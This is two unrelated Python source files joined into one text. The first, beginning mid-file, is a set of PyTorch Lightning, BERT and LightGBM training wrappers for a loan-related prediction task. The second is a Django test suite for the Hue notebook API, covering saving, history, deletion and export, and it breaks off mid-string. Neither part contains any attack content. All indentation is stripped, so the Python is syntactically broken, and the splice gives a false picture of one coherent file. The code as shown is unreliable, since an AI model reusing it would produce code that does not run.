params = prepareModelDir(params, self.__class__.__name__)
self.edit_params = params
pl.seed_everything(params[params["random_seed_name__"]])
torch.backends.cudnn.enabled = True
self.model.setParams(params)
batch_size = params["batch_size"]
if batch_size < 0:
batch_size = X_train.shape[0]
data_set_train = params["dataset_class"](X_train, y_train, params["dataset_params"], train_flag=True)
dataloader_train = torch.utils.data.DataLoader(data_set_train, batch_size=batch_size, shuffle=True, collate_fn=params["collate_fn"],num_workers=params["num_workers"]) #, sampler=ImbalancedDatasetSampler(data_set_train))
dataloader_val = None
if X_valid is not None:
data_set_val = params["dataset_class"](X_valid, y_valid, params["dataset_params"], train_flag=True)
dataloader_val = torch.utils.data.DataLoader(data_set_val, batch_size=batch_size, shuffle=False, collate_fn=params["collate_fn"],num_workers=params["num_workers"])
wandb_logger=None
if (not ON_KAGGLE) and (params["no_wandb"]==False):
wandb_run = wandb.init(project=PROJECT_NAME, group=params["wb_group_name"], reinit=True, name=params["wb_run_name"] )
wandb_logger = WandbLogger(experment=wandb_run)
wandb_logger.log_hyperparams(params)
early_stop_callback = EarlyStopping(
monitor=f'val_{params["eval_metric"]}',
min_delta=0.00,
patience=params['early_stopping_rounds'],
verbose=True,
mode=params['eval_max_or_min']
)
checkpoint_callback = ModelCheckpoint(
dirpath=PATH_TO_MODEL_DIR / params["model_dir_name"],
filename=params["path_to_model"].stem,
verbose=True,
monitor=f'val_{params["eval_metric"]}',
mode=params['eval_max_or_min'],
save_weights_only=True,
)
callbacks_list = []
if params['early_stopping_rounds'] <= self.initial_params["epochs"]:
callbacks_list = [early_stop_callback, checkpoint_callback]
metrics_callback = MetricsCallback(monitor_metric=f'val_{params["eval_metric"]}',min_max_flag=params['eval_max_or_min'])
callbacks_list.append(metrics_callback)
self.trainer = pl.Trainer(
num_sanity_val_steps=0,
gpus=self.initial_params["use_gpu"],
check_val_every_n_epoch=self.initial_params["val_every"],
max_epochs=self.initial_params["epochs"],
accumulate_grad_batches=self.initial_params["accumulate_grad_batches"],
callbacks=callbacks_list,#early_stop_callback, checkpoint_callback],
logger=wandb_logger,
)
self.trainer.fit(self.model, dataloader_train, dataloader_val)
if X_valid is None:
new_path = checkExistsAndAddVnum(params["path_to_model"])
self.trainer.save_checkpoint(str(new_path))
self.best_score_, self.best_iteration_ = metrics_callback.getScoreInfo()
print(self.best_score_)
self.feature_importances_ = np.zeros(len(X_train.columns))
def predict(self, X_test, oof_flag=False):
num_tta = self.edit_params["num_tta"]
batch_size=self.edit_params["batch_size"]
dummy_y = pd.DataFrame(np.zeros((X_test.shape[0], 1)), index=X_test.index)
data_set_test = self.edit_params["dataset_class"](X_test, dummy_y, self.edit_params["dataset_params"], train_flag=(num_tta>1))
dataloader_test = torch.utils.data.DataLoader(data_set_test, batch_size=batch_size, shuffle=False, collate_fn=self.edit_params["collate_fn"],num_workers=self.edit_params["num_workers"])
self.model.oof_prediction = oof_flag
if self.model.oof_prediction==False:
self.trainer.logger = None
tta_list = []
for tta_i in range(num_tta):
print(f"tta : {tta_i+1}th")
if self.reload_flag:
self.trainer.test(test_dataloaders=dataloader_test, model=self.model)
else:
self.trainer.test(test_dataloaders=dataloader_test, ckpt_path='best')
final_preds = self.model.final_preds
tta_list.append(final_preds)
#pdb.set_trace()
return np.array(tta_list).mean(axis=0)
def procModelSaving(self, model_dir_name, prefix, bs):
ppath_to_save_dir = PATH_TO_MODEL_DIR / model_dir_name
if not ppath_to_save_dir.exists():
ppath_to_save_dir.mkdir()
ppath_to_model = ppath_to_save_dir / f"model__{prefix}__{model_dir_name}__{self.__class__.__name__}.pkl"
torch.save(self.model.state_dict(), str(ppath_to_model))
print(f'Trained nn model was saved! : {ppath_to_model}')
with open(str(ppath_to_model).replace("model__", "bs__").replace("pkl", "json"), 'w') as fp:
json.dump(bs, fp)
def procLoadModel(self, model_dir_name, prefix, params):
self.edit_params = params
self.model.cuda()
if params["multi_gpu"]:
self.model = nn.DataParallel(self.model)
ppath_to_save_dir = PATH_TO_UPLOAD_MODEL_PARENT_DIR / model_dir_name
print(f"ppath_to_save_dir : {ppath_to_save_dir}")
print(list(ppath_to_save_dir.glob(f'model__{prefix}*')))
#print(list(ppath_to_save_dir.iterdir()))
name_list = list(ppath_to_save_dir.glob(f'model__{prefix}*'))
if len(name_list)==0:
print(f'[ERROR] Trained nn model was NOT EXITS! : {prefix}')
return -1
ppath_to_model = name_list[0]
ppath_to_ckpt_model = searchCheckptFile(ppath_to_save_dir, ppath_to_model, prefix)
#pdb.set_trace()
self.model.load_state_dict(torch.load(str(ppath_to_ckpt_model))["state_dict"])
#self.model.load_state_dict(torch.load(str(ppath_to_model)))
print(f'Trained nn model was loaded! : {ppath_to_ckpt_model}')
a = int(re.findall('iter_(\d+)__', str(ppath_to_model))[0])
#print(self.model.best_iteration_ )
#self.model.best_iteration_
self.best_iteration_ = a
path_to_json = str(ppath_to_model).replace("model__", "bs__").replace("pkl", "json")
if not os.path.exists(path_to_json):
print(f'[ERROR] Trained nn json was NOT EXITS! : {path_to_json}')
return -1
with open(path_to_json) as fp:
self.best_score_ = json.load(fp)
#self.model._best_score = json.load(fp)
self.trainer = pl.Trainer(
num_sanity_val_steps=0,
gpus=self.edit_params["use_gpu"],
check_val_every_n_epoch=self.edit_params["val_every"],
max_epochs=self.edit_params["epochs"],
)
self.reload_flag = True
return 0
class BERT_Wrapper(PytrochLightningBase):
def __init__(self,
model_name,
auxiliary_loss_flag,
text_features_list,
embedding_category_features_list,
continuous_features_list,
label_list,
weight_list=None,
max_token_len=200, #128,#162,#200,#256, #,
_type="regression",
exp="None",
):
super().__init__()
if model_name == "bert":
path_of_pretrained_model = 'bert-base-cased'
elif model_name == "bert-tiny":
path_of_pretrained_model = "prajjwal1/bert-tiny"
elif model_name == "finbert":
path_of_pretrained_model = "ipuneetrathore/bert-base-cased-finetuned-finBERT"
elif model_name == "funnel":
path_of_pretrained_model = "funnel-transformer/small"
elif model_name == "bart":
path_of_pretrained_model = 'facebook/bart-base'
elif model_name == "distilbert":
path_of_pretrained_model = 'distilbert-base-cased'
elif model_name == "multilingual":
path_of_pretrained_model = "bert-base-multilingual-cased"
elif model_name == "roberta-base":
path_of_pretrained_model = "roberta-base"
elif model_name == "bert-large":
path_of_pretrained_model = "bert-large-cased"
elif model_name == "gpt2":
path_of_pretrained_model = "gpt2"
self.initial_params["dataset_class"] = BertDataSet
self.initial_params["collate_fn"] = None#collate_fn_LSTM
n_classes = len(label_list) #if _type=="regression" else 400
if auxiliary_loss_flag:
aux_loss_list = ["loan_in_currency2"]
continuous_features_list = [c for c in continuous_features_list if c not in aux_loss_list ]
else:
aux_loss_list=[]
self.initial_params["dataset_params"] = {
"embedding_category_features_list":embedding_category_features_list,
"continuous_features_list":continuous_features_list,
"text_feature":text_features_list[0],
"weight_list":weight_list,
#"use_feature_cols":use_feature_cols,
#"last_query_flag":last_query_flag,
"max_token_len":max_token_len,
"label_col":label_list + aux_loss_list, #["LOAN_AMOUNT"] + aux_loss_list,
"path_of_pretrained_model":path_of_pretrained_model,
}
ppath_to_decode_dict = PROC_DIR / 'decode_dict.pkl'
if ppath_to_decode_dict.exists():
dec_dict = pickle_load(ppath_to_decode_dict)
else:
dec_dict=None
emb_dim_pairs_list = []
print("embedding_category_features_list")
for col in embedding_category_features_list:
if col == "ORIGINAL_LANGUAGE":
dim = 5
emb_dim = 3
elif col == "ACTIVITY_NAME":
dim = 161
emb_dim = 50
elif col == "SECTOR_NAME":
dim = 15
emb_dim = 8
elif col == "COUNTRY_NAME":
dim = 61
emb_dim = 30
elif col == "CURRENCY":
dim = 51
emb_dim = 25
elif col == "REPAYMENT_INTERVAL":
dim = 3
emb_dim = 2
# elif col == "DISTRIBUTION_MODEL":
# dim = 2
# emb_dim = 2
elif col == "COUNTRY_CURRENCY":
dim = 75
emb_dim = 38
elif col == "TOWN_NAME_COUNTRY_NAME":
dim = 2822
emb_dim = 50
else:
if (dec_dict is not None) & (col in dec_dict.keys()):
dim = len(dec_dict[col].keys())
emb_dim = min(dim//2, 50)
else:
continue
#dim = int(df_all[col].nunique())
pair = (dim, emb_dim)
emb_dim_pairs_list.append(pair)
print("{} : {}".format(col, pair))
self.model = myBert(
model_name=model_name,
path_of_pretrained_model=path_of_pretrained_model,
n_numerical_features=len(continuous_features_list),
n_emb_features = len(embedding_category_features_list),
emb_dim_pairs_list=emb_dim_pairs_list,
n_classes=n_classes,
n_classes_aux=len(aux_loss_list),
_type = _type,
exp=exp,
)
print(self.model)
def predict(self, X_test, oof_flag=False):
num_tta = self.edit_params["num_tta"]
assert num_tta==1
if num_tta == 1:
np_pred = super().predict(X_test, oof_flag)
#TODO: get final attention
return np_pred
def prepareModelDir(params, prefix):
ppath_to_save_dir = PATH_TO_MODEL_DIR / params["model_dir_name"]
if not ppath_to_save_dir.exists():
ppath_to_save_dir.mkdir()
params["path_to_model"] = ppath_to_save_dir / f"{prefix}_train_model.ckpt"
return params
def checkExistsAndAddVnum(ppath_to_model):
v_num = 0
cur_path = ppath_to_model
stem = cur_path.stem
while cur_path.exists():
v_num+=1
cur_path = cur_path.parent/f"{stem}-v{v_num}.ckpt"
return cur_path
class LGBWrapper_Base(object):
"""
A wrapper for lightgbm model so that we will have a single api for various models.
"""
def __init__(self):
self.model = None
self.initial_params = {
'n_jobs': -1,
#"device":"gpu",
'boosting_type': 'gbdt',
"random_seed_name__":"random_state",
"deal_numpy":False,
"first_metric_only": True,
'max_depth': 6,
#'max_bin': 300,
#'bagging_fraction': 0.9,
#'bagging_freq': 1,
'colsample_bytree': 0.9,
#'colsample_bylevel': 0.3,
#'min_data_per_leaf': 2,
"min_child_samples":12, #8,
'num_leaves': 120,#240,#2048,#1024,#31,#240,#120,#32, #3000, #700, #500, #400, #300, #120, #80,#300,
'lambda_l1': 0.9,#0.5,
'lambda_l2': 0.9,#0.5,
}
def getWeight(self, X_train, params):
if isinstance(X_train, pd.DataFrame):
weight_list = params["weight_list"]
if len(weight_list) == 0:
np_weight=None
elif len(weight_list)==1:
np_weight = X_train[weight_list[0]].values
X_train = X_train.drop(columns=weight_list)
else:
raise Exception("set only one weight col to weight_list")
else:
raise Exception("not implemented error : weight col for numpy X_train")
return X_train, np_weight
def fit(self, X_train, y_train, X_valid=None, y_valid=None, X_holdout=None, y_holdout=None, params=None):
self.edit_params=params
metric_name = list(params["eval_metric_func_dict__"].keys())[0]
print(f"metric_name : {metric_name}")
eval_metric = params["eval_metric_func_dict__"][metric_name]
params["metric"] = "None"
print(f"----------eval_metric:{callable(eval_metric)}")
X_train, np_weight = self.getWeight(X_train, params)
eval_set = [(X_train.values, y_train.values)] if isinstance(X_train, pd.DataFrame) else [(X_train, y_train)]
eval_names = ['train']
self.model = self.model.set_params(**extractModelParametersWithStr(params, exclude_str="__"))
if X_valid is not None:
if isinstance(X_valid, pd.DataFrame):
eval_set.append((X_valid.values, y_valid.values))
else:
eval_set.append((X_valid, y_valid))
eval_names.append('valid')
if X_holdout is not None:
if isinstance(X_holdout, pd.DataFrame):
eval_set.append((X_holdout.values, y_holdout.values))
else:
eval_set.append((X_holdout, y_holdout))
eval_names.append('holdout')
categorical_columns = 'auto'
call_back_list = []
if (not ON_KAGGLE) and (params["no_wandb"]==False):
wandb.init(project=PROJECT_NAME, group=params["wb_group_name"], reinit=True, name=params["wb_run_name"] )
wandb.config.update(params, allow_val_change=True)
call_back_list.append(wandb_callback())
self.model.fit(X=X_train, y=y_train, sample_weight=np_weight,
eval_set=eval_set, eval_names=eval_names, eval_metric=eval_metric,
verbose=params['verbose'], early_stopping_rounds=params['early_stopping_rounds'],
categorical_feature=categorical_columns,
callbacks=call_back_list,
)
print(self.model)
self.best_score_ = self.model.best_score_
print(self.best_score_)
self.feature_importances_ = self.model.feature_importances_
self.best_iteration_ = self.model.best_iteration_
def predict(self, X_test, oof_flag=True):
X_test, np_weight = self.getWeight(X_test, self.edit_params)
return self.model.predict(X_test, num_iteration=self.model.best_iteration_).reshape(-1, 1)
def procModelSaving(self, model_dir_name, prefix, bs):
ppath_to_save_dir = PATH_TO_MODEL_DIR / model_dir_name
if not ppath_to_save_dir.exists():
ppath_to_save_dir.mkdir()
ppath_to_model = ppath_to_save_dir / f"model__{prefix}__{model_dir_name}__{self.__class__.__name__}.pkl"
pickle.dump(self.model, open(ppath_to_model, 'wb'))
print(f'Trained LGB model was saved! : {ppath_to_model}')
with open(str(ppath_to_model).replace("model__", "bs__").replace("pkl", "json"), 'w') as fp:
json.dump(bs, fp)
def procLoadModel(self, model_dir_name, prefix, params):
ppath_to_save_dir = PATH_TO_UPLOAD_MODEL_PARENT_DIR / model_dir_name
print(f"ppath_to_save_dir : {ppath_to_save_dir}")
print(list(ppath_to_save_dir.glob(f'model__{prefix}*')))
#print(list(ppath_to_save_dir.iterdir()))
name_list = list(ppath_to_save_dir.glob(f'model__{prefix}*'))
if len(name_list)==0:
print(f'[ERROR] Trained LGB model was NOT EXITS! : {prefix}')
return -1
ppath_to_model = name_list[0]
# if not os.path.exists(ppath_to_model):
# print(f'[ERROR] Trained LGB model was NOT EXITS! : {ppath_to_model}')
# return -1
self.model = pickle.load(open(ppath_to_model, 'rb'))
print(f'Trained LGB model was loaded! : {ppath_to_model}')
a = int(re.findall('iter_(\d+)__', str(ppath_to_model))[0])
self.model._best_iteration= a
#print(self.model.best_iteration_ )
#self.model.best_iteration_
self.best_iteration_ = self.model.best_iteration_
path_to_json = str(ppath_to_model).replace("model__", "bs__").replace("pkl", "json")
if not os.path.exists(path_to_json):
print(f'[ERROR] Trained LGB json was NOT EXITS! : {path_to_json}')
return -1
with open(path_to_json) as fp:
self.best_score_ = json.load(fp)
#self.model._best_score = json.load(fp)
return 0
class LGBWrapper_regr(LGBWrapper_Base):
"""
A wrapper for lightgbm model so that we will have a single api for various models.
"""
def __init__(self):
super().__init__()
self.model = lgb.LGBMRegressor()
print(f"lgb version : {lgb.__version__}")
self.initial_params['objective'] = 'regression' #torch_rmse #'regression'
self.initial_params['metric'] = 'mae'
def fit(self, X_train, y_train, X_valid=None, y_valid=None, X_holdout=None, y_holdout=None, params=None):
if isinstance(y_train, pd.DataFrame):
assert y_train.shape[1] == 1
y_train = y_train.iloc[:,0]
if y_valid is not None:
if isinstance(y_valid, pd.DataFrame):
assert y_valid.shape[1] == 1
y_valid = y_valid.iloc[:,0]
if y_holdout is not None:
if isinstance(y_holdout, pd.DataFrame):
assert y_holdout.shape[1] == 1
y_holdout = y_holdout.iloc[:,0]
#pdb.set_trace()
super().fit(X_train=X_train, y_train=y_train, X_valid=X_valid, y_valid=y_valid, X_holdout=X_holdout, y_holdout=y_holdout, params=params)
class LGBWrapper_cls(LGBWrapper_Base):
"""
A wrapper for lightgbm model so that we will have a single api for various models.
"""
def __init__(self):
super().__init__()
self.model = lgb.LGBMClassifier()
self.initial_params['num_leaves'] = 3
self.initial_params['max_depth'] = 8
self.initial_params['min_data_in_leaf'] = 3
def proc_predict(self, X_test, oof_flag=False):
if oof_flag:
pred = self.model.predict(X_test, num_iteration=self.model.best_iteration_)
else:
pred = self.model.predict_proba(X_test, num_iteration=self.model.best_iteration_)
return pred
#def predict_proba(self, X_test):
def predict(self, X_test, oof_flag=False):
if (self.model.objective == 'binary') :
#print("X_test b:", X_test)
#print("X_test:shape b", X_test.shape)
return self.model.predict_proba(X_test, num_iteration=self.model.best_iteration_)[:, 1]
else:
return self.model.predict_proba(X_test, num_iteration=self.model.best_iteration_)
#pred = self.proc_predict(X_test, oof_flag)
#return self.model.predict(X_test, num_iteration=self.model.best_iteration_)
def predict_proba(self, X_test):
#print("X_test:", X_test)
#print("X_test:shape", X_test.shape)
return self.model.predict_proba(X_test, num_iteration=self.model.best_iteration_)
|
#!/usr/bin/env python
## -*- coding: utf-8 -*-
# Licensed to Cloudera, Inc. under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. Cloudera, Inc. licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
from collections import OrderedDict
from nose.tools import assert_equal, assert_true, assert_false
from django.contrib.auth.models import User
from django.urls import reverse
from azure.conf import is_adls_enabled
from desktop import appmanager
from desktop.conf import APP_BLACKLIST
from desktop.lib.django_test_util import make_logged_in_client
from desktop.lib.test_utils import grant_access, add_permission
from desktop.models import Directory, Document, Document2
from hadoop import cluster as originalCluster
import notebook.connectors.hiveserver2
from notebook.api import _historify
from notebook.connectors.base import Notebook, QueryError, Api
from notebook.decorators import api_error_handler
from notebook.conf import get_ordered_interpreters, INTERPRETERS_SHOWN_ON_WHEEL, INTERPRETERS
from notebook.models import Analytics
class TestNotebookApi(object):
def setUp(self):
self.client = make_logged_in_client(username="test", groupname="default", recreate=True, is_superuser=False)
self.client_not_me = make_logged_in_client(username="not_perm_user", groupname="default", recreate=True, is_superuser=False)
self.user = User.objects.get(username="test")
self.user_not_me = User.objects.get(username="not_perm_user")
grant_access("test", "default", "notebook")
grant_access("not_perm_user", "default", "notebook")
self.notebook_json = """
{
"selectedSnippet": "hive",
"showHistory": false,
"description": "Test Hive Query",
"name": "Test Hive Query",
"sessions": [
{
"type": "hive",
"properties": [],
"id": null
}
],
"type": "query-hive",
"id": 50010,
"snippets": [{"id":"2b7d1f46-17a0-30af-efeb-33d4c29b1055","type":"hive","status":"running","statement_raw":"select * from default.web_logs where app = '${app_name}';","variables":[{"name":"app_name","value":"metastore"}],"statement":"select * from default.web_logs where app = 'metastore';","properties":{"settings":[],"files":[],"functions":[]},"result":{"id":"b424befa-f4f5-8799-a0b4-79753f2552b1","type":"table","handle":{"log_context":null,"statements_count":1,"end":{"column":21,"row":0},"statement_id":0,"has_more_statements":false,"start":{"column":0,"row":0},"secret":"rVRWw7YPRGqPT7LZ/TeFaA==an","has_result_set":true,"statement":"select * from default.web_logs where app = 'metastore';","operation_type":0,"modified_row_count":null,"guid":"7xm6+epkRx6dyvYvGNYePA==an"}},"lastExecuted": 1462554843817,"database":"default"}],
"uuid": "5982a274-de78-083c-2efc-74f53dce744c",
"isSaved": false,
"parentUuid": null
}
"""
self.notebook = json.loads(self.notebook_json)
self.doc2 = Document2.objects.create(id=50010, name=self.notebook['name'], type=self.notebook['type'], owner=self.user)
self.doc1 = Document.objects.link(self.doc2, owner=self.user, name=self.doc2.name,
description=self.doc2.description, extra=self.doc2.type)
def test_save_notebook(self):
# Test that saving a new document with a new parent will set the parent_directory
home_dir = Document2.objects.get_home_directory(self.user)
assert_equal(home_dir.uuid, self.doc2.parent_directory.uuid)
new_dir = Directory.objects.create(name='new_dir', owner=self.user, parent_directory=home_dir)
notebook_cp = self.notebook.copy()
notebook_cp.pop('id')
notebook_cp['directoryUuid'] = new_dir.uuid
notebook_json = json.dumps(notebook_cp)
response = self.client.post(reverse('notebook:save_notebook'), {'notebook': notebook_json})
data = json.loads(response.content)
assert_equal(0, data['status'], data)
doc = Document2.objects.get(pk=data['id'])
assert_equal(new_dir.uuid, doc.parent_directory.uuid)
# Test that saving a new document with a no parent will map it to its home dir
notebook_json = """
{
"selectedSnippet": "hive",
"showHistory": false,
"description": "Test Hive Query",
"name": "Test Hive Query",
"sessions": [
{
"type": "hive",
"properties": [],
"id": null
}
],
"type": "query-hive",
"id": null,
"snippets": [{"id":"2b7d1f46-17a0-30af-efeb-33d4c29b1055","type":"hive","status":"running","statement_raw":"select * from default.web_logs where app = '${app_name}';","variables":[{"name":"app_name","value":"metastore"}],"statement":"select * from default.web_logs where app = 'metastore';","properties":{"settings":[],"files":[],"functions":[]},"result":{"id":"b424befa-f4f5-8799-a0b4-79753f2552b1","type":"table","handle":{"log_context":null,"statements_count":1,"end":{"column":21,"row":0},"statement_id":0,"has_more_statements":false,"start":{"column":0,"row":0},"secret":"rVRWw7YPRGqPT7LZ/TeFaA==an","has_result_set":true,"statement":"select * from default.web_logs where app = 'metastore';","operation_type":0,"modified_row_count":null,"guid":"7xm6+epkRx6dyvYvGNYePA==an"}},"lastExecuted": 1462554843817,"database":"default"}],
"uuid": "d9efdee1-ef25-4d43-b8f9-1a170f69a05a"
}
"""
response = self.client.post(reverse('notebook:save_notebook'), {'notebook': notebook_json})
data = json.loads(response.content)
assert_equal(0, data['status'], data)
doc = Document2.objects.get(pk=data['id'])
assert_equal(Document2.objects.get_home_directory(self.user).uuid, doc.parent_directory.uuid)
# Test that saving a notebook will save the search field to the first statement text
assert_equal(doc.search, "select * from default.web_logs where app = 'metastore';")
def test_historify(self):
# Starts with no history
assert_equal(0, Document2.objects.filter(name__contains=self.notebook['name'], is_history=True).count())
assert_equal(1, Document.objects.filter(name__contains=self.notebook['name']).count())
history_doc = _historify(self.notebook, self.user)
assert_true(history_doc.id > 0)
# Test that historify creates new Doc2 and linked Doc1
assert_equal(1, Document2.objects.filter(name__contains=self.notebook['name'], is_history=True).count())
assert_equal(2, Document.objects.filter(name__contains=self.notebook['name']).count())
# Historify again
history_doc = _historify(self.notebook, self.user)
assert_equal(2, Document2.objects.filter(name__contains=self.notebook['name'], is_history=True).count())
assert_equal(3, Document.objects.filter(name__contains=self.notebook['name']).count())
def test_get_history(self):
assert_equal(0, Document2.objects.filter(name__contains=self.notebook['name'], is_history=True).count())
_historify(self.notebook, self.user)
_historify(self.notebook, self.user)
_historify(self.notebook, self.user)
assert_equal(3, Document2.objects.filter(name__contains=self.notebook['name'], is_history=True).count())
# History should not return history objects that don't have the given doc type
Document2.objects.create(name='Impala History', type='query-impala', data=self.notebook_json, owner=self.user, is_history=True)
# Verify that get_history API returns history objects for given type and current user
response = self.client.get(reverse('notebook:get_history'), {'doc_type': 'hive'})
data = json.loads(response.content)
assert_equal(0, data['status'], data)
assert_equal(3, len(data['history']), data)
assert_true(all(doc['type'] == 'query-hive' for doc in data['history']), data)
# TODO: test that query history for shared query only returns docs accessible by current user
def test_clear_history(self):
assert_equal(0, Document2.objects.filter(name__contains=self.notebook['name'], is_history=True).count())
_historify(self.notebook, self.user)
_historify(self.notebook, self.user)
_historify(self.notebook, self.user)
assert_equal(3, Document2.objects.filter(name__contains=self.notebook['name'], is_history=True).count())
# Clear history should not clear history objects that don't have the given doc type
Document2.objects.create(name='Impala History', type='query-impala', owner=self.user, is_history=True)
# clear history should retain original document but wipe history
response = self.client.post(reverse('notebook:clear_history'), {'notebook': self.notebook_json, 'doc_type': 'hive'})
data = json.loads(response.content)
assert_equal(0, data['status'], data)
assert_false(Document2.objects.filter(type='query-hive', is_history=True).exists())
assert_true(Document2.objects.filter(type='query-hive', is_history=False).exists())
assert_true(Document2.objects.filter(type='query-impala', is_history=True).exists())
def test_delete_notebook(self):
trash_notebook_json = """
{
"selectedSnippet": "hive",
"showHistory": false,
"description": "Test Hive Query",
"name": "Test Hive Query",
"sessions": [
{
"type": "hive",
"properties": [],
"id": null
}
],
"type": "query-hive",
"id": null,
"snippets": [{"id": "e069ef32-5c95-4507-b961-e79c090b5abf","type":"hive","status":"ready","database":"default","statement":"select * from web_logs","statement_raw":"select * from web_logs","variables":[],"properties":{"settings":[],"files":[],"functions":[]},"result":{}}],
"uuid": "8a20da5f-b69c-4843-b17d-dea5c74c41d1"
}
"""
# Assert that the notebook is first saved
response = self.client.post(reverse('notebook:save_notebook'), {'notebook': trash_notebook_json})
data = json.loads(response.content)
assert_equal(0, data['status'], data)
# Test that deleting it moves it to the user's Trash folder
notebook_doc = Document2.objects.get(id=data['id'])
trash_notebooks = [Notebook(notebook_doc).get_data()]
response = self.client.post(reverse('notebook:delete'), {'notebooks': json.dumps(trash_notebooks)})
data = json.loads(response.content)
assert_equal(0, data['status'], data)
assert_equal('Trashed 1 notebook(s)', data['message'], data)
response = self.client.get('/desktop/api2/doc', {'path': '/.Trash'})
data = json.loads(response.content)
trash_uuids = [doc['uuid'] for doc in data['children']]
assert_true(notebook_doc.uuid in trash_uuids, data)
# Test that any errors are reported in the response
nonexistant_doc = {
"id": 12345,
"uuid": "ea22da5f-b69c-4843-b17d-dea5c74c41d1",
"selectedSnippet": "hive",
"showHistory": False,
"description": "Test Hive Query",
"name": "Test Hive Query",
"sessions": [
{
"type": "hive",
"properties": [],
"id": None,
}
],
"type": "query-hive",
"snippets": [{
"id": "e069ef32-5c95-4507-b961-e79c090b5abf",
"type": "hive",
"status": "ready",
"database": "default",
"statement": "select * from web_logs",
"statement_raw": "select * from web_logs",
"variables": [],
"properties": {"settings": [], "files": [], "functions": []},
"result": {}
}]
}
trash_notebooks = [nonexistant_doc]
response = self.client.post(reverse('notebook:delete'), {'notebooks': json.dumps(trash_notebooks)})
data = json.loads(response.content)
assert_equal(0, data['status'], data)
assert_equal('Trashed 0 notebook(s) and failed to delete 1 notebook(s).', data['message'], data)
assert_equal(['ea22da5f-b69c-4843-b17d-dea5c74c41d1'], data['errors'])
def test_query_error_encoding(self):
@api_error_handler
def send_exception(message):
raise QueryError(message=message)
message = """SELECT
a.key,
a.*
FROM customers c, c.addresses a"""
response =send_exception(message)
data = json.loads(response.content)
assert_equal(1, data['status'])
message = """SELECT
\u2002\u2002a.key,
\u2002\u2002a.*
FROM customers c, c.addresses a"""
response =send_exception(message)
data = json.loads(response.content)
assert_equal(1, data['status'])
message = u"""SELECT
a.key,
a.*
FROM déclenché c, c.addresses a"""
response =send_exception(message)
data = json.loads(response.content)
assert_equal(1, data['status'])
class MockedApi(Api):
def execute(self, notebook, snippet):
return {
'sync': True,
'has_result_set': True,
'result': {
'has_more': False,
'data': [['test']],
'meta': [{
'name': 'test',
'type': '',
'comment': ''
}],
'type': 'table'
}
}
def close_statement(self, notebook, snippet):
pass
def export_data_as_hdfs_file(self, snippet, target_file, overwrite):
return {'destination': target_file}
class MockFs():
def __init__(self, logical_name=None):
self.fs_defaultfs = 'hdfs://curacao:8020'
self.logical_name = logical_name if logical_name else ''
self.DEFAULT_USER = 'test'
self.user = 'test'
self._filebrowser_action = ''
def setuser(self, user):
self.user = user
@property
def user(self):
return self.user
def do_as_user(self, username, fn, *args, **kwargs):
return ''
def exists(self, path):
return True
def isdir(self, path):
return path == '/user/hue'
def filebrowser_action(self):
return self._filebrowser_action
class TestNotebookApiMocked(object):
def setUp(self):
self.client = make_logged_in_client(username="test", groupname="default", recreate=True, is_superuser=False)
self.client_not_me = make_logged_in_client(username="not_perm_user", groupname="default", recreate=True, is_superuser=False)
self.user = User.objects.get(username="test")
self.user_not_me = User.objects.get(username="not_perm_user")
# Beware: Monkey patch HS2API Mock API
if not hasattr(notebook.connectors.hiveserver2, 'original_HS2Api'): # Could not monkey patch base.get_api
notebook.connectors.hiveserver2.original_HS2Api = notebook.connectors.hiveserver2.HS2Api
notebook.connectors.hiveserver2.HS2Api = MockedApi
originalCluster.get_hdfs()
self.original_fs = originalCluster.FS_CACHE["default"]
originalCluster.FS_CACHE["default"] = MockFs()
grant_access("test", "default", "notebook")
grant_access("test", "default", "beeswax")
grant_access("test", "default", "hive")
grant_access("not_perm_user", "default", "notebook")
grant_access("not_perm_user", "default", "beeswax")
grant_access("not_perm_user", "default", "hive")
add_permission('test', 'has_adls', permname='adls_access', appname='filebrowser')
def tearDown(self):
notebook.connectors.hiveserver2.HS2Api = notebook.connectors.hiveserver2.original_HS2Api
if originalCluster.FS_CACHE is None:
originalCluster.FS_CACHE = {}
originalCluster.FS_CACHE["default"] = self.original_fs
def test_export_result(self):
notebook_json = """
{
"selectedSnippet": "hive",
"showHistory": false,
"description": "Test Hive Query",
"name": "Test Hive Query",
"sessions": [
{
"type": "hive",
"properties": [],
"id": null
}
],
"type": "query-hive",
"id": null,
"snippets": [{"id":"2b7d1f46-17a0-30af-efeb-33d4c29b1055","type":"hive","status":"running","statement":"select * from web_logs","properties":{"settings":[],"variables":[],"files":[],"functions":[]},"result":{"id":"b424befa-f4f5-8799-a0b4-79753f2552b1","type":"table","handle":{"log_context":null,"statements_count":1,"end":{"column":21,"row":0},"statement_id":0,"has_more_statements":false,"start":{"column":0,"row":0},"secret":"rVRWw7YPRGqPT7LZ/TeFaA==an","has_result_set":true,"statement":"select * from web_logs","operation_type":0,"modified_row_count":null,"guid":"7xm6+epkRx6dyvYvGNYePA==an"}},"lastExecuted": 1462554843817,"database":"default"}],
"uuid": "d9efdee1-ef25-4d43-b8f9-1a170f69a05a"
}
"""
response = self.client.post(reverse('notebook:export_result'), {
'notebook': notebook_json,
'snippet': json.dumps(json.loads(notebook_json)['snippets'][0]),
'format': json.dumps('hdfs-file'),
'destination': json.dumps('/user/hue'),
'overwrite': json.dumps(False)
})
data = json.loads(response.content)
assert_equal(0, data['status'], data)
assert_equal('/user/hue/Test Hive Query.csv', data['watch_url']['destination'], data)
response = self.client.post(reverse('notebook:export_result'), {
'notebook': notebook_json,
'snippet': json.dumps(json.loads(notebook_json)['snippets'][0]),
'format': json.dumps('hdfs-file'),
'destination': json.dumps('/user/hue/path.csv'),
'overwrite': json.dumps(False)
})
data = json.loads(response.content)
assert_equal(0, data['status'], data)
assert_equal('/user/hue/path.csv', data['watch_url']['destination'], data)
if is_adls_enabled():
response = self.client.post(reverse('notebook:export_result'), {
'notebook': notebook_json,
'snippet': json.dumps(json.loads(notebook_json)['snippets'][0]),
'format': json.dumps('hdfs-file'),
'destination': json.dumps('adl:/user/hue/path.csv'),
'overwrite': json.dumps(False)
})
data = json.loads(response.content)
assert_equal(0, data['status'], data)
assert_equal('adl:/user/hue/path.csv', data['watch_url']['destination'], data)
def test_download_result(self):
notebook_json = """
{
"selectedSnippet": "hive",
"showHistory": false,
